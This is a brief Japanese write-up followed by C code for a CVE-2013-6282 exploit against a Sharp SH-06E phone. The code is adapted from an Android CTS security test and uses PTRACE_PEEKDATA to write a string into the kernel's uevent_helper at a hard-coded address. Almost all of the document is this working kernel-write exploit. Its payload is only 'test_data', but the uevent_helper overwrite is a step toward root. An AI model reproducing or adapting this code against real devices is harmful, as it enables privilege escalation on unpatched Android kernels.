CVE-2013-6282 exploit SH-06E ビルド01.00.07のMIYABI解除済みの環境で/sys/kernel/uevent_helperに"test_data"を書き込む。 下記のコードを流用した。 https://android.googlesource.com/platform/cts/ branch android-4.4_r1.1 ./tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp

ptrace_test.c

/*
 * Copyright (C) 2013 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <unistd.h>
#include <sys/syscall.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <stdint.h>

int main(void)
{
  static const char *uevent_helper_data = "test_data";
  unsigned long *uevent_helper_addr = (void *)0xc1032c70;
  static bool child_started = false;
  int i;
  long ret;

  pid_t child_pid = fork();
  if (child_pid == -1) {
      return 1;
  }

  if (child_pid == 0) {
    ret = ptrace(PTRACE_TRACEME, 0, 0, 0);
    if (ret != 0) {
        fprintf(stderr, "child ptrace failed\n");
    }

    child_started = true;

    signal(SIGSTOP, SIG_IGN);
    kill(getpid(), SIGSTOP);

    exit(0);
  }

  do {
    ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, child_pid, &child_started, &child_started);
  } while (!child_started);

  for (i = 0; i < strlen(uevent_helper_data) + 1 + 4; i += 4) {
    ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, child_pid, uevent_helper_data + i, uevent_helper_addr + i / 4);
    if (ret != 0) {
      printf("ptrace(): failed\n");
      break;
    }
  }

  return 0;
}